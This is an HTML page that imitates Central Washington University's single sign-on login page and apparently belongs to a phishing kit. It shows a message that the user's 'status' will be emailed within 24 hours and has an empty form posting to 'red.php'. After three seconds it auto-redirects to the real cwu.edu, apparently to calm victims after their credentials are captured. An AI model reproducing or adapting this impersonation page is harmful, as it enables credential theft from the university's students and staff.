<!DOCTYPE html>
<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    	<meta charset="utf-8">
    	<title>CWU Login Service</title>
    	<link rel="stylesheet" type="text/css" href="CWU%20Login%20Service_files/main.css">
  	</head>
  	<body>
    <div class="wrapper">
      <div class="container">
        <header>
          <img src="CWU%20Login%20Service_files/logoGD.png" alt="CWU Logo">
        </header>

        


<div class="row">
    <div class="col-md-6 main-context">
    	<div class="well">
    		<p class="heading">You will be notified about your status by email within 24 hours.</p>
    		<form autocomplete="off" enctype="application/x-www-form-urlencoded" action="red.php" method="post" name="query" id="loginForm">
    			
    
    		</div>
</div>
</div>

<meta http-equiv="Refresh" content="3; url=http://www.cwu.edu/" />
			
            
        
          <div class="column two">
            <ul class="list list-help">
                              <li class="list-help-item"><a href="https://wildcatpassword.cwu.edu/"><span class="item-marker">›</span> Forgot your password?</a></li>
                            <li class="list-help-item"><a href="http://www.cwu.edu/its-helpdesk"><span class="item-marker">›</span> Need Help?</a></li>
            </ul>
          </div>
        </div>
      </div>

      <footer>
        <div class="container container-footer">
          <p class="footer-text">NOTICE: You are logging in to one or 
more web applications via the CWU single sign on service. When you have 
finished using these applications, in order to log out fully you MUST 
close all browser windows and tabs and exit your browser (Chrome, 
Firefox, Internet Explorer, Safari, etc.). Failure to do so may allow 
other users of this computer to access your personal information.</p>
        </div>
      </footer>
    </div>
    
 	

</body></html>